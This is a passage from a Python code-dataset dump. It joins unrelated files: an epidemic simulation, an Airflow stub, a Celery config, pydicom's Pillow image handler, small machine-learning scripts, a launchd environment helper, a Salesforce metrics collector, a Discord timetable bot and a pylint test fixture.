        self.show_symptoms(DAY)
        if self.__remove_from_placeholder__(): #If person is in city and removal is successful
            self.TruthStatus.SIcuP.add(self)
            self.Last_Added_Placeholder = 4
    def isolate(self,Today):
        acceptable_states = [self.status[0],self.status[1],self.status[3],self.status[4],self.status[5]]
        assert self.Status in acceptable_states
        if self.Status == self.status[0] or self.Status == self.status[1]:
            self.show_symptoms(Today)
        if self.Last_Added_Placeholder != 2:
            if self.__remove_from_placeholder__(): #If person is in city and removal is successful
                self.TruthStatus.SIsolatedP.add(self)
                self.Last_Added_Placeholder = 2
        self.Status = self.status[5]
        self._remove_()
    def is_Free(self):
        return self.Status == self.status[0]
    def is_Quarentined(self):
        return self.Status == self.status[1]
    def is_Out_of_City(self):
        return self.Status == self.status[2]
    def is_Hospitalized(self):
        return self.Status == self.status[3]
    def is_ICU(self):
        return self.Status == self.status[4]
    def is_Isolation(self):
        return self.Status == self.status[5]
class AgentStateA(AgentStatusA):
    # Disease states; index order matters for the transitions below.
    states = ['Healthy','Asymptomatic','Symptomatic','Recovered','Died']
    def __init__(self):
        """Agent state is the status of the person with respect to the virus
        """
        super(AgentStateA, self).__init__()
        #self = person
        self.State = self.states[0]
        self.TruthStatus = None
    def infected(self,DAY):
        # Healthy -> Asymptomatic; the agent joins the free-asymptomatic pool.
        # NOTE(review): self.History is written here but initialised elsewhere
        # (presumably on the person object) — confirm.
        acceptable_states = [self.states[0]]
        assert self.State in acceptable_states
        self.State = self.states[1]
        self.TruthStatus.AFreeP.add(self)
        self.Last_Added_Placeholder = 0
        self.History["Infected"] = DAY
    def show_symptoms(self,DAY):
        # Asymptomatic/Symptomatic -> Symptomatic (idempotent on repeat calls).
        acceptable_states = [self.states[1],self.states[2]]
        assert self.State in acceptable_states
        self.State = self.states[2]
        self.History["Symptomatic"] = DAY
    def recover(self,DAY):
        # Symptomatic -> Recovered; mobility becomes Isolation.
        acceptable_states = [self.states[2]]
        assert self.State in acceptable_states
        self.State = self.states[3]
        self.Status = self.status[5]
        if self.__remove_from_placeholder__(): # removal succeeded, i.e. the person is in the city
            self.TruthStatus.RRecoveredP.add(self)
            self.Last_Added_Placeholder =5
        self.History["Recovered"] = DAY
        self.History["Died"] = -1
    def die(self,DAY):
        # Symptomatic -> Died; mobility becomes Isolation.
        acceptable_states = [self.states[2]]
        assert self.State in acceptable_states
        self.State = self.states[4]
        self.Status = self.status[5]
        if self.__remove_from_placeholder__(): # removal succeeded, i.e. the person is in the city
            self.TruthStatus.RDiedP.add(self)
            self.Last_Added_Placeholder = 6
        self.History["Recovered"] = -1
        self.History["Died"] = DAY
    def is_Healthy(self):
        return self.State == self.states[0]
    def is_Asymptomatic(self):
        return self.State == self.states[1]
    def is_Symptomatic(self):
        return self.State == self.states[2]
    def is_Recovered(self):
        return self.State == self.states[3]
    def is_Died(self):
        return self.State == self.states[4]
class TestingState(object):
    """Virus-testing state of a person, driven by a shared ``transitions`` machine.

    The class-level ``machine`` (model=None) is shared by all instances; each
    instance keeps its own ``state`` string.  Trigger methods such as
    ``awaiting_test`` are not defined on the class: ``__getattribute__``
    forwards unknown attribute lookups to the machine's events.
    States: Not_tested -> Awaiting_Testing -> Tested_Positive / Tested_Negative
    (a negative result may be re-queued).
    """
    machine = transitions.Machine(model=None, states=['Not_tested', 'Awaiting_Testing', 'Tested_Positive','Tested_Negative'], initial='Not_tested',
        transitions=[
            {'trigger': 'awaiting_test', 'source': ['Not_tested','Awaiting_Testing','Tested_Negative'], 'dest': 'Awaiting_Testing','before':'add_to_TestingQueue'},
            {'trigger': 'tested_positive', 'source': 'Awaiting_Testing', 'dest': 'Tested_Positive','before':'tested_positive_func'},
            {'trigger': 'tested_negative', 'source': 'Awaiting_Testing', 'dest': 'Tested_Negative','before':'tested_negative_func'},
        ])
    def __init__(self):
        """Start every person as 'Not_tested'."""
        super().__init__()
        self.state = 'Not_tested'
    def __remove_from_testing_list__(self):
        # Drop this person from the city's pending-test queue.
        self.City.TestingQueue.remove(self)
    def add_to_TestingQueue(self, PrivateTest=False):
        """'before' hook of ``awaiting_test``: enqueue with the City's testing queue.

        Private tests bypass the public queue entirely.  A person re-queued
        after a negative result is removed from the Negative set again.
        """
        # This function is for the City to add citizens into testingQueue
        if PrivateTest == False:
            if self.state != 'Awaiting_Testing' :
                self.City.TestingQueue.append(self)
            if self.state == 'Tested_Negative':
                self.City.TestedP['Negative'].remove(self)
        #print('City {} added person {}'.format(self.City.Name, self.IntID))
        #pass type of test
    def tested_positive_func(self,Today, PrivateTest=False):
        """'before' hook of ``tested_positive``: record the result and isolate if quarantined."""
        self.City.TestedP['Positive'].add(self)
        self.City.NumTestedPositive += 1
        if PrivateTest == False:
            self.__remove_from_testing_list__()
        if self.is_Quarentined():
            self.isolate(Today)
    def tested_negative_func(self, PrivateTest=False):
        """'before' hook of ``tested_negative``: record the result and leave the queue."""
        self.City.TestedP['Negative'].add(self)
        if PrivateTest == False:
            self.__remove_from_testing_list__()
    def __getattribute__(self, item):
        """Fall back to the shared state machine's event triggers.

        Unknown attributes that name a machine event (e.g. ``awaiting_test``)
        resolve to a partial of that event's trigger bound to this instance;
        anything else re-raises the original AttributeError.
        """
        try:
            return super(TestingState, self).__getattribute__(item)
        except AttributeError:
            if item in self.machine.events:
                return partial(self.machine.events[item].trigger, self)
            raise
| StarcoderdataPython |
165142 | <reponame>ryanchao2012/airfly
# Auto generated by 'inv collect-airflow'
from airfly._vendor.airflow.models.baseoperator import BaseOperator
class EmrAddStepsOperator(BaseOperator):
    """Auto-generated annotation stub mirroring Airflow's EmrAddStepsOperator.

    Only class-level type annotations are declared (no behavior).  The
    annotations are string literals, so ``typing`` need not be imported.
    """
    # Either a concrete job flow id or a name + cluster states to look it up.
    job_flow_id: "typing.Union[str, NoneType]"
    job_flow_name: "typing.Union[str, NoneType]"
    cluster_states: "typing.Union[typing.List[str], NoneType]"
    # AWS connection to use.
    aws_conn_id: "str"
    # EMR steps: a list of dicts or a templated string.
    steps: "typing.Union[typing.List[dict], str, NoneType]"
| StarcoderdataPython |
1695446 | <reponame>tumb1er/celery-amqp-events
""" Default configuration for EventsCelery."""
from typing import Any, Dict, Tuple, Optional
from celery.app.task import Task
# Defaults merged into an EventsCelery app's configuration.
AMQP_EVENTS_CONFIG: Dict[str, Any] = {
    # Connections
    'broker_url': 'amqp://guest:guest@localhost:5672/',
    'result_backend': None,
    # Queues and routing — all events go through one topic exchange/queue.
    'task_queues': [],
    'task_default_exchange': 'events',
    'task_default_exchange_type': 'topic',
    'task_default_queue': 'events',
    'task_default_routing_key': 'events',
    'task_routes': ['amqp_events.config:route_for_event'],
    # Robustness — ack only after success, requeue on worker loss,
    # and require broker publish confirms.
    'task_acks_late': True,
    'task_acks_on_failure_or_timeout': False,
    'task_reject_on_worker_lost': True,
    'broker_transport_options': {'confirm_publish': True},
}
# noinspection PyUnusedLocal
def route_for_event(name: str,
                    args: Tuple[Any, ...],
                    kwargs: Dict[str, Any],
                    options: Dict[str, Any],
                    task: Optional[Task] = None,
                    **kw: Any) -> Dict[str, str]:
    """Route every event to its own routing key.

    Without an explicit routing function Celery tries to declare and bind the
    default queue while sending events, which leads to unexpected behavior.
    An explicit ``routing_key`` in *options* takes precedence over the event
    name.  Exchange settings intentionally stay with the app defaults
    (``task_default_exchange`` / ``task_default_exchange_type``).
    """
    routing_key = options.get('routing_key', name)
    return {'routing_key': routing_key}
| StarcoderdataPython |
1611708 | <gh_stars>0
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Use the `pillow <https://python-pillow.org/>`_ Python package
to decode *Pixel Data*.
"""
import io
import logging
from typing import TYPE_CHECKING, cast
import warnings
if TYPE_CHECKING: # pragma: no cover
from pydicom.dataset import Dataset, FileMetaDataset, FileDataset
try:
import numpy
HAVE_NP = True
except ImportError:
HAVE_NP = False
try:
import PIL
from PIL import Image, features
HAVE_PIL = True
HAVE_JPEG = features.check_codec("jpg")
HAVE_JPEG2K = features.check_codec("jpg_2000")
except ImportError:
HAVE_PIL = False
HAVE_JPEG = False
HAVE_JPEG2K = False
from pydicom import config
from pydicom.encaps import defragment_data, decode_data_sequence
from pydicom.pixel_data_handlers.util import pixel_dtype, get_j2k_parameters
from pydicom.uid import (
UID, JPEG2000, JPEG2000Lossless, JPEGBaseline8Bit, JPEGExtended12Bit
)
logger = logging.getLogger('pydicom')
# Transfer syntaxes this handler can decode, grouped by codec.
PillowJPEG2000TransferSyntaxes = [JPEG2000, JPEG2000Lossless]
PillowJPEGTransferSyntaxes = [JPEGBaseline8Bit, JPEGExtended12Bit]
PillowSupportedTransferSyntaxes = (
    PillowJPEGTransferSyntaxes + PillowJPEG2000TransferSyntaxes
)
# Handler metadata consumed by pydicom's handler registry.
HANDLER_NAME = 'Pillow'
DEPENDENCIES = {
    'numpy': ('http://www.numpy.org/', 'NumPy'),
    'PIL': ('https://python-pillow.org/', 'Pillow'),
}
def is_available() -> bool:
    """Return ``True`` when both NumPy and Pillow imported successfully."""
    return all((HAVE_NP, HAVE_PIL))
def supports_transfer_syntax(transfer_syntax: UID) -> bool:
    """Return ``True`` if this handler can decode `transfer_syntax`.

    Parameters
    ----------
    transfer_syntax : uid.UID
        The Transfer Syntax UID of the *Pixel Data* that is to be used with
        the handler.
    """
    supported = PillowSupportedTransferSyntaxes
    return transfer_syntax in supported
def needs_to_convert_to_RGB(ds: "Dataset") -> bool:
    """Return ``True`` if the *Pixel Data* should be converted from YCbCr to
    RGB.

    This affects JPEG transfer syntaxes; this handler never requests the
    conversion, so the answer is always ``False``.
    """
    return False
def should_change_PhotometricInterpretation_to_RGB(ds: "Dataset") -> bool:
    """Return ``True`` if the *Photometric Interpretation* should be changed
    to RGB.

    This affects JPEG transfer syntaxes.  The change is currently disabled:
    the previous implementation computed ``ds.SamplesPerPixel == 3`` into an
    unused local (dead code that could also raise ``AttributeError`` for
    datasets without *Samples per Pixel*) and then returned ``False``
    unconditionally.  The unused lookup has been removed.
    """
    return False
def _decompress_single_frame(
    data: bytes,
    transfer_syntax: str,
    photometric_interpretation: str
) -> "Image":
    """Decompress a single frame of an encapsulated Pixel Data element.

    Parameters
    ----------
    data: bytes
        Compressed pixel data
    transfer_syntax: str
        Transfer Syntax UID
    photometric_interpretation: str
        Photometric Interpretation

    Returns
    -------
    PIL.Image
        Decompressed pixel data
    """
    fio = io.BytesIO(data)
    image = Image.open(fio)
    # This hack ensures that RGB color images, which were not
    # color transformed (i.e. not transformed into YCbCr color space)
    # upon JPEG compression are decompressed correctly.
    # Since Pillow assumes that images were transformed into YCbCr color
    # space prior to compression, setting the value of "mode" to YCbCr
    # signals Pillow to not apply any color transformation upon
    # decompression.
    if (transfer_syntax in PillowJPEGTransferSyntaxes and
            photometric_interpretation == 'RGB'):
        # An Adobe APP14 transform marker means the data really was
        # transformed, so only patch untransformed streams.
        if 'adobe_transform' not in image.info:
            color_mode = 'YCbCr'
            # Rewrite the decode tile so Pillow decodes as raw YCbCr.
            image.tile = [(
                'jpeg',
                image.tile[0][1],
                image.tile[0][2],
                (color_mode, ''),
            )]
            image.mode = color_mode
            image.rawmode = color_mode
    return image
def get_pixeldata(ds: "Dataset") -> "numpy.ndarray":
    """Return a :class:`numpy.ndarray` of the *Pixel Data*.

    Parameters
    ----------
    ds : Dataset
        The :class:`Dataset` containing an Image Pixel module and the
        *Pixel Data* to be decompressed and returned.

    Returns
    -------
    numpy.ndarray
        The contents of (7FE0,0010) *Pixel Data* as a 1D array.

    Raises
    ------
    ImportError
        If Pillow is not available.
    NotImplementedError
        If the transfer syntax is not supported
    """
    transfer_syntax = ds.file_meta.TransferSyntaxUID
    # Fail fast if the required Pillow codecs are missing.
    if not HAVE_PIL:
        raise ImportError(
            f"The pillow package is required to use pixel_array for "
            f"this transfer syntax {transfer_syntax.name}, and pillow could "
            f"not be imported."
        )
    if not HAVE_JPEG and transfer_syntax in PillowJPEGTransferSyntaxes:
        raise NotImplementedError(
            f"The pixel data with transfer syntax {transfer_syntax.name}, "
            f"cannot be read because Pillow lacks the JPEG plugin"
        )
    if not HAVE_JPEG2K and transfer_syntax in PillowJPEG2000TransferSyntaxes:
        raise NotImplementedError(
            f"The pixel data with transfer syntax {transfer_syntax.name}, "
            f"cannot be read because Pillow lacks the JPEG 2000 plugin"
        )
    if transfer_syntax == JPEGExtended12Bit and ds.BitsAllocated != 8:
        raise NotImplementedError(
            f"{JPEGExtended12Bit} - {JPEGExtended12Bit.name} only supported "
            "by Pillow if Bits Allocated = 8"
        )
    # Image Pixel module values used below.
    photometric_interpretation = cast(str, ds.PhotometricInterpretation)
    rows = cast(int, ds.Rows)
    columns = cast(int, ds.Columns)
    bits_stored = cast(int, ds.BitsStored)
    bits_allocated = cast(int, ds.BitsAllocated)
    nr_frames = getattr(ds, 'NumberOfFrames', 1) or 1
    # Decompressed frames are accumulated into one contiguous byte buffer.
    pixel_bytes = bytearray()
    if nr_frames > 1:
        j2k_precision, j2k_sign = None, None
        # multiple compressed frames
        for frame in decode_data_sequence(ds.PixelData):
            im = _decompress_single_frame(
                frame,
                transfer_syntax,
                photometric_interpretation
            )
            if 'YBR' in photometric_interpretation:
                im.draft('YCbCr', (rows, columns))
            pixel_bytes.extend(im.tobytes())
            # J2K precision/sign are read once, from the first frame.
            if not j2k_precision:
                params = get_j2k_parameters(frame)
                j2k_precision = cast(
                    int, params.setdefault("precision", bits_stored)
                )
                j2k_sign = params.setdefault("is_signed", None)
    else:
        # single compressed frame
        pixel_data = defragment_data(ds.PixelData)
        im = _decompress_single_frame(
            pixel_data,
            transfer_syntax,
            photometric_interpretation
        )
        if 'YBR' in photometric_interpretation:
            im.draft('YCbCr', (rows, columns))
        pixel_bytes.extend(im.tobytes())
        params = get_j2k_parameters(pixel_data)
        j2k_precision = cast(int, params.setdefault("precision", bits_stored))
        j2k_sign = params.setdefault("is_signed", None)
    logger.debug(f"Successfully read {len(pixel_bytes)} pixel bytes")
    arr = numpy.frombuffer(pixel_bytes, pixel_dtype(ds))
    if transfer_syntax in PillowJPEG2000TransferSyntaxes:
        # Pillow converts N-bit data to 8- or 16-bit unsigned data,
        # See Pillow src/libImaging/Jpeg2KDecode.c::j2ku_gray_i
        shift = bits_allocated - bits_stored
        if j2k_precision and j2k_precision != bits_stored:
            warnings.warn(
                f"The (0028,0101) 'Bits Stored' value ({bits_stored}-bit) "
                f"doesn't match the JPEG 2000 data ({j2k_precision}-bit). "
                f"It's recommended that you change the 'Bits Stored' value"
            )
        if config.APPLY_J2K_CORRECTIONS and j2k_precision:
            # Corrections based on J2K data
            shift = bits_allocated - j2k_precision
            if not j2k_sign and j2k_sign != ds.PixelRepresentation:
                # Convert unsigned J2K data to 2's complement
                arr = numpy.right_shift(arr, shift)
            else:
                if ds.PixelRepresentation == 1:
                    # Pillow converts signed data to unsigned
                    # so we need to undo this conversion
                    arr -= 2**(bits_allocated - 1)
                if shift:
                    arr = numpy.right_shift(arr, shift)
        else:
            # Corrections based on dataset elements
            if ds.PixelRepresentation == 1:
                arr -= 2**(bits_allocated - 1)
            if shift:
                arr = numpy.right_shift(arr, shift)
    if should_change_PhotometricInterpretation_to_RGB(ds):
        ds.PhotometricInterpretation = "RGB"
    return cast("numpy.ndarray", arr)
| StarcoderdataPython |
1732096 |
# coding: utf-8
# In[14]:
import numpy as np
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier as KNC
# Train a K-nearest-neighbours classifier on the Iris dataset and compare
# predictions against the held-out last 10 samples of a shuffled split.
iris = datasets.load_iris()
x= iris.data
y= iris.target
np.unique(y)  # NOTE(review): result discarded — this call has no effect
np.random.seed(123)  # fixed seed so the shuffle is reproducible
indices = np.random.permutation(len(x))
# Last 10 shuffled samples are held out as the test set.
iris_x_train = x[indices[:-10]]
iris_y_train = y[indices[:-10]]
iris_x_test = x[indices[-10:]]
iris_y_test = y[indices[-10:]]
model=KNC()  # default hyper-parameters (n_neighbors=5)
model.fit(iris_x_train, iris_y_train)
# NOTE(review): this constructs a second, unused classifier and discards it;
# it does not configure ``model``.
KNC(algorithm='auto',leaf_size=30, metric='minkowski',
    metric_params=None,n_jobs=1,n_neighbors=5, p=2,weights='uniform')
out=model.predict(iris_x_test)
print("predicted:",out)
print("True :",iris_y_test)
| StarcoderdataPython |
3341452 | #! /usr/bin/python
from __future__ import print_function

import argparse
import logging
import os
import pprint
import re
import shlex
import string
import subprocess
import sys

from logging import StreamHandler
from logging.handlers import SysLogHandler
# Character sets describing a valid environment-variable identifier:
# a letter/underscore start, then letters, digits or underscores.
ALPHABET = frozenset(string.ascii_letters)
IDENTIFIER_START = ALPHABET | set('_')
IDENTIFIER = IDENTIFIER_START | set(string.digits)
logger = logging.getLogger()
# Pick the platform's syslog socket: macOS uses /var/run/syslog, Linux /dev/log.
syslog_sock = None
if os.path.exists('/var/run/syslog'):
    syslog_sock = '/var/run/syslog'
elif os.path.exists('/dev/log'):
    syslog_sock = '/dev/log'
# Log everything to stdout, and to syslog when a socket was found.
logger.setLevel(logging.DEBUG)
logger.addHandler(StreamHandler(sys.stdout))
if syslog_sock:
    logger.addHandler(SysLogHandler(syslog_sock))
def validate_name(name):
    """Return True if *name* is a valid environment-variable identifier.

    Valid names match ``[A-Za-z_][A-Za-z0-9_]*``: a letter or underscore
    followed by letters, digits or underscores.  Empty strings are rejected.
    The explicit ASCII character classes keep the semantics identical to the
    original frozenset-based checks on both Python 2 and 3.
    """
    return re.match(r'[A-Za-z_][A-Za-z0-9_]*\Z', name) is not None
def sanitize_name(name):
    """Strip surrounding whitespace from *name* and return it.

    Raises ``ValueError`` when the stripped name is still not a valid
    identifier.
    """
    cleaned = name.strip()
    if validate_name(cleaned):
        return cleaned
    raise ValueError('Invalid Name')
def process_value(value):
    """Normalise an environment-variable value read from launchd.env.

    Falsy values become ''.  Surrounding whitespace is stripped (with a
    warning), single shell-quoted words are unquoted via ``shlex``, and
    ``$VARS`` / ``~`` are expanded.  Values that split into multiple shell
    words are kept intact (only a warning is emitted).

    Uses ``logger.warning`` — ``Logger.warn`` is a deprecated alias.
    """
    if not value:
        return ''
    if value.isspace():
        logger.warning(
            'Value %s consists solely of spaces - is this a bug?' % repr(value)
        )
        logger.warning(
            'Replacing whitespace value %s with empty string' % repr(value)
        )
        return ''
    orig = value
    if value[0].isspace():
        logger.warning('Stripping leading space in value=%s' % repr(orig))
        value = value.lstrip()
    if value[-1].isspace():
        logger.warning('Stripping trailing space in value=%s' % repr(orig))
        value = value.rstrip()
    words = shlex.split(value)
    if len(words) > 1:
        # The old message claimed the words were being "joined"; the value is
        # actually left as the whole (stripped) string, so say so.
        logger.warning(
            'Value %s splits to multiple arguments, keeping it intact' % repr(orig)
        )
    else:
        value = words[0]
    result = os.path.expandvars(value)
    result = os.path.expanduser(result)
    return result
def post_process(name, value):
    """Apply per-variable fix-ups, export the result, and return (name, value).

    For PATH-like variables each ':'-separated entry gets ``~`` expanded.
    The original comparison ``name.upper().lower() == 'PATH'`` could never be
    true (the folded string is lowercase), so the PATH branch was dead code;
    the case-insensitive comparison is now done correctly.
    """
    if name.upper() == 'PATH':
        entries = value.split(':')
        value = ':'.join(os.path.expanduser(entry) for entry in entries)
    # Export into this process's environment so later expandvars() calls see it.
    os.environ[name] = value
    return name, value
def process_line(line):
    """Parse one ``NAME=value`` line from launchd.env.

    Returns ``(name, value)`` after sanitising/normalising, or ``(None, None)``
    for blank lines, comments, and lines whose name cannot be repaired.
    Raises ``ValueError`` when '=' is missing.

    Bug fix: ``sanitize_name()`` was being called without its required
    argument, which raised TypeError instead of repairing the name.
    """
    if not line.strip() or line.startswith('#'):
        return None, None
    tup = line.strip().split('=', 1)
    if len(tup) < 2:
        raise ValueError("Missing '=' in line %s" % repr(line))
    name, value = tup
    if not validate_name(name):
        try:
            name = sanitize_name(name)
            logger.warning(
                'Sanitized invalid line: name=%s, value=%s'
                % (repr(name), repr(value))
            )
        except ValueError:
            logger.error(
                'Skipping invalid line: name=%s, value=%s'
                % (repr(name), repr(value))
            )
            return None, None
    value = process_value(value)
    name, value = post_process(name, value)
    return name, value
def main():
    """Read launchd.env and register each variable with ``launchctl setenv``.

    The process environment is first reduced to HOME only, so expansions in
    the env file cannot pick up stray inherited variables.  With ``-n`` /
    ``--dry-run`` the invocation is logged but not executed.

    Bug fix: ``name in ('HOME')`` tested substring membership in the string
    'HOME' (so 'H', 'OM', 'ME', ... all matched); it now uses a 1-tuple.
    """
    logger.info('Starting setenv script')
    env = {name: val for name, val in os.environ.items() if name in ('HOME',)}
    os.environ.clear()
    for name, val in env.items():
        os.environ[name] = val
    s = pprint.pformat(os.environ)
    logger.debug(s)
    parser = argparse.ArgumentParser()
    parser.add_argument('-n', '--dry-run', action='store_true')
    args = parser.parse_args()
    directory = os.path.dirname(__file__) or '.'
    invocation = ['/bin/launchctl', 'setenv']
    with open(os.path.join(directory, 'launchd.env')) as f:
        for line in f:
            name, value = process_line(line)
            if not name:
                continue
            invocation.append(name)
            invocation.append(value)
    # Log each NAME=value pair; promote to INFO for dry runs so it's visible.
    level = logging.INFO if args.dry_run else logging.DEBUG
    for name, value in zip(invocation[2::2], invocation[3::2]):
        logger.log(level, '%s=%s' % (name, repr(value)))
    s = pprint.pformat(os.environ)
    logger.debug(s)
    if args.dry_run:
        return 0
    return subprocess.call(invocation)
if __name__ == '__main__':
sys.exit(main())
| StarcoderdataPython |
1657861 | <filename>Pycharm Repository/Preprocessor.py
import re
import nltk
from sklearn.datasets import load_files
#nltk.download('stopwords')
import pickle
from nltk.corpus import stopwords
# Load the two-category review corpus; each category is a sub-folder.
test_data = load_files(r"...\txt_sentoken") # folder containing the 2 categories of documents in individual folders.
X, y = test_data.data, test_data.target
documents = []
# Clean each raw document into a lowercase, lemmatized string.
for sen in range(0, len(X)):
    # Remove all the special characters
    document = re.sub(r'\W', ' ', str(X[sen]))
    # remove all single characters
    document = re.sub(r'\s+[a-zA-Z]\s+', ' ', document)
    # Remove single characters from the start
    # NOTE(review): r'\^' matches a literal caret, not the start anchor —
    # this pattern likely should be r'^[a-zA-Z]\s+'.
    document = re.sub(r'\^[a-zA-Z]\s+', ' ', document)
    # Substituting multiple spaces with single space
    document = re.sub(r'\s+', ' ', document, flags=re.I)
    # Removing prefixed 'b'
    document = re.sub(r'^b\s+', '', document)
    # Converting to Lowercase
    document = document.lower()
    # Lemmatization
    document = document.split()
    # NOTE(review): importing and constructing the lemmatizer inside the loop
    # is wasteful; it could be hoisted above the loop.
    from nltk.stem import WordNetLemmatizer
    stemmer = WordNetLemmatizer()
    document = [stemmer.lemmatize(word) for word in document]
    document = ' '.join(document)
    documents.append(document)
#Convert the word to a vector using BOW model.
from sklearn.feature_extraction.text import CountVectorizer
vectorizer = CountVectorizer(max_features=1500, min_df=0.1, max_df=0.7, stop_words=stopwords.words('english'))
X = vectorizer.fit_transform(documents).toarray()
'''Using TFIDF instead of BOW, TFIDF also takes into account the frequency instead of just the occurance.
calculated as:
Term frequency = (Number of Occurrences of a word)/(Total words in the document)
IDF(word) = Log((Total number of documents)/(Number of documents containing the word))
TF-IDF is the product of the two.
'''
#from sklearn.feature_extraction.text import TfidfTransformer
#from sklearn.feature_extraction.text import TfidfVectorizer
#tfidfconverter = TfidfTransformer()
#tf = TfidfVectorizer()
#X = tf.fit_transform(movie_data.split('\n'))
#X = tfidfconverter.fit_transform(X).toarray()
''' Creating training and test sets of the data'''
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
'''train a clasifier with the data'''
#from sklearn.ensemble import RandomForestClassifier
#classifier = RandomForestClassifier(n_estimators=1000, random_state=0)
from sklearn import svm
classifier = svm.SVC()
classifier.fit(X_train, y_train)
'''Now predict on the testing data'''
y_pred = classifier.predict(X_test)
'''Print the evaluation metrices'''
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
print(accuracy_score(y_test, y_pred))
print('FINISHED')
| StarcoderdataPython |
3293981 | from prometheus_client.core import GaugeMetricFamily
from SalesforcePy import client as sfdc_client
from os import environ
import logging
import requests
logging.basicConfig(level=logging.INFO)
class Collector(object):
    """Prometheus collector exposing Salesforce org limits as gauge metrics.

    Logs in with credentials taken from the environment, fetches the
    ``/limits`` REST resource and flattens the nested response into
    ``sfdc_remaining_*`` / ``sfdc_limit_*`` gauges labelled with the
    deployment environment.
    """
    def __init__(self):
        # All credentials/config come from environment variables.
        self.salesforce_version = environ["SF_VERSION"]
        self.environment = environ.get("ENVIRONMENT") or "local"
        self.client = sfdc_client(
            username=environ["AUTH_USERNAME"],
            password=environ["<PASSWORD>"],
            client_id=environ["CONSUMER_ID"],
            client_secret=environ["CONSUMER_SECRET"],
            login_url=environ["SF_URL"],
            version=self.salesforce_version,
            timeout="30",
        )
    def fetch_salesforce_logs(self):
        """Log in and return the org's /limits payload as a dict.

        Raises ConnectionRefusedError on bad credentials and ConnectionError
        on any non-200 response.
        """
        logging.info("Fetching Salesforce access credentials.")
        credentials = self.client.login()[0]
        if not credentials:
            raise ConnectionRefusedError("Incorrect credentials. Please try again....")
        headers = {
            "Authorization": f"Bearer {credentials['access_token']}",
        }
        logging.info("Fetching Salesforce logs.")
        response = requests.get(
            f"{credentials['instance_url']}/services/data/v{self.salesforce_version}/limits",
            headers=headers,
        )
        if response.status_code == 200:
            logging.info(f"[{response.status_code}]: Logs fetched successfully.")
            return response.json()
        else:
            raise ConnectionError(f"[{response.status_code}]: {response.text}")
    def iterator(self, logs: dict, parent=None):
        """Recursively yield gauges for every Remaining/Max leaf in *logs*.

        Nested dict keys are joined with '_' to build the metric name.
        NOTE(review): ``metric`` is only assigned when *parent* is set; a
        'Remaining'/'Max' key at the top level (parent=None) would raise
        NameError — confirm the /limits payload always nests these keys.
        """
        for key, value in logs.items():
            if parent:
                # Metric names may not contain spaces or dots.
                metric = f"{parent}".replace(" ", "_").replace(".", "_")
            if type(value) == dict:
                if parent:
                    new_parent = f"{parent}_{key}"
                else:
                    new_parent = key
                for log in self.iterator(logs=value, parent=new_parent):
                    yield log
            elif key == "Remaining":
                c = GaugeMetricFamily(
                    f"sfdc_remaining_{metric}",
                    f"{parent or ''} {key}",
                    labels=["env"],
                )
                c.add_metric([self.environment], value)
                yield c
            elif key == "Max":
                c = GaugeMetricFamily(
                    f"sfdc_limit_{metric}",
                    f"{parent or ''} {key}",
                    labels=["env"],
                )
                c.add_metric([self.environment], value)
                yield c
    def collect(self):
        """Prometheus entry point: fetch fresh limits and yield all gauges."""
        logs = self.fetch_salesforce_logs()
        for log in self.iterator(logs=logs):
            yield log
| StarcoderdataPython |
152641 | import asyncio
import discord
from discord.ext import commands
import get_link
client = commands.Bot(command_prefix='.') # Sets the prefix to listen.
async def post_tasks():
    """Background loop: every 24 h, wipe the channel and repost the current
    timetable sections scraped by get_link.py, then ping @everyone."""
    await client.wait_until_ready()
    channel = client.get_channel(680655448042504232)  # target channel ID
    # Section headings, indexed by the section numbers used by get_link.py
    # (hoisted out of the loop — it never changes between iterations).
    titel = ['None', 'None', 'Deutsch', 'English', 'Mathe', 'FBE', 'Datenbanken', 'Programmieren', 'FBIN', 'None',
             'None', 'Politik', 'Wirtschaft', 'None', 'None']
    while not client.is_closed():
        await channel.purge(limit=100)
        get_link.get_html()  # re-download the webpage so the data is fresh
        for section in range(2, 14):  # sections exposed by get_link.py
            text = str(get_link.get_information_main(section)).replace('[', '').replace(']', '').replace("'", '')
            # str() never returns None, so the old ``text == None`` check could
            # never be true; a missing section shows up as the string 'None'.
            if text == 'None':
                test = "Oh nothing found xD"
            else:
                test = "Footer :D"
            message = discord.Embed(
                # was ``titel=``: an unrecognised kwarg, so embeds had no title
                title=titel[section],
                description=text,
                colour=discord.Colour.blurple()
            )
            message.set_footer(text=test)
            await channel.send(embed=message)
        await channel.send('@everyone ')
        await asyncio.sleep(86400)  # repeat once per day
@client.event
async def on_ready():
    """Log the bot's identity once the Discord connection is established."""
    print('Logged in as')
    print(client.user.name)
    print(client.user.id)
    print('------')
@client.command()
async def post(ctx):
    """Manually repost the data extracted by get_link.py as plain text (no embeds).

    discord.py invokes command callbacks with a Context as the first argument;
    the old zero-argument signature raised TypeError whenever ``.post`` was used.
    """
    channel = client.get_channel(680655448042504232)
    lists = ['None', 'None', 'Deutsch', 'English', 'Mathe', 'FBE', 'Datenbanken', 'Programmieren', 'FBIN', 'None',
             'None', 'Politik', 'Wirtschaft', 'None', 'None']
    for section in range(2, 14):
        await channel.send(str(lists[section])+'\n'+str(get_link.get_information_main(section))) #Not sent in an embed remember it
@client.command()
async def vertretungsplan(message): # this method will sends the link below and mentions the author of the request
    """Post the WebUntis substitution-plan link and mention the requester.

    NOTE(review): ``message`` receives the command Context here, so
    ``{0.author.mention}`` resolves via ``ctx.author`` — confirm against the
    discord.py version in use.
    """
    channel = client.get_channel(680655448042504232)
    await channel.send('https://webuntis.krzn.de/WebUntis/monitor?school=bk-technik-moers&monitorType'
                       '=subst&format=Schulflur' + '{0.author.mention}'.format(message))
@client.command()
async def clear(ctx): # Method to manually clear the channel
    """Delete up to 100 recent messages from the hard-coded channel."""
    channel = client.get_channel(680655448042504232)
    await channel.purge(limit=100)
client.loop.create_task(post_tasks())
client.run('')
| StarcoderdataPython |
4816400 | <reponame>mami-project/lurk
"""Check unpacking non-sequences in assignments. """
# pylint: disable=too-few-public-methods, invalid-name, attribute-defined-outside-init, unused-variable, no-absolute-import
from os import rename as nonseq_func
from functional.unpacking import nonseq
__revision__ = 0
# Working
class Seq(object):
    """A minimal sequence: __getitem__ + __len__ make it unpackable."""
    def __init__(self):
        self.items = list(range(2))  # two items so ``a, b = Seq()`` succeeds
    def __getitem__(self, item):
